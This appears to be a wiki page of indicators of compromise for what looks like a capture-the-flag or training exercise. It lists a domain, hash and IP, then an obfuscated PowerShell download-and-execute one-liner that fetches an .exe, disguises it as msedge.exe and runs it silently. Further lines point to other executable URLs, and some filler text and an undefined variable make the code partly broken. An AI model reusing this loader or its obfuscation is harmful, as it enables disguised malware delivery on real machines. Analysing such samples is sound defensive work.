Skip to content

IOC & OBFUSCATED POWERSHELL SAMPLE

Jump to bottom
Nicolas Saputra Gunawan edited this page Nov 4, 2024 · 1 revision

Domain:

  • donate.v2.xmrig.xom

Hash:

  • 4db55b2df58083e75c9471d2b79e1f9edf9491f423313b4e125349fed3507227

IP:

  • 54.38.54.135

Powershell:

$u='ht'+'tp://192.168.0.16:8282/B64_dec'+'ode_RkxBR3tEYXl1bV90aGlzX'+'2lzX3NlY3JldF9maWxlfQ%3'+'D%3D/chall_mem_se'+'arch.e'+'xe';$t='Wan'+'iTem'+'p';mkdir -force $env:TMP\..\$t;try{iwr $u -OutFile $d\msedge.exe;& $d\msedge.exe;}catch{}
anjashdadada-asd;
$awikwok = 'https://cyberyolk.com/malwer.exe'
$bajigur = 'http://102.232.233.121/affah.exe'
$u='ht'+'tp://192.168.0.16:8282/B64_dec'+'ode_RkxBR3tEYXl1bV90aGlzX'+'2lzX3NlY3JldF9maWxlfQ%3'+'D%3D/chall_mem_se'+'arch.e'+'xe';$t='Wan'+'iTem'+'p';mkdir -force $env:TMP\..\$t;try{iwr $u -OutFile $d\msedge.exe;& $d\msedge.exe;}catch{}
$a = 'Https://v1.lonlife.info/ayam.exe'
Clone this wiki locally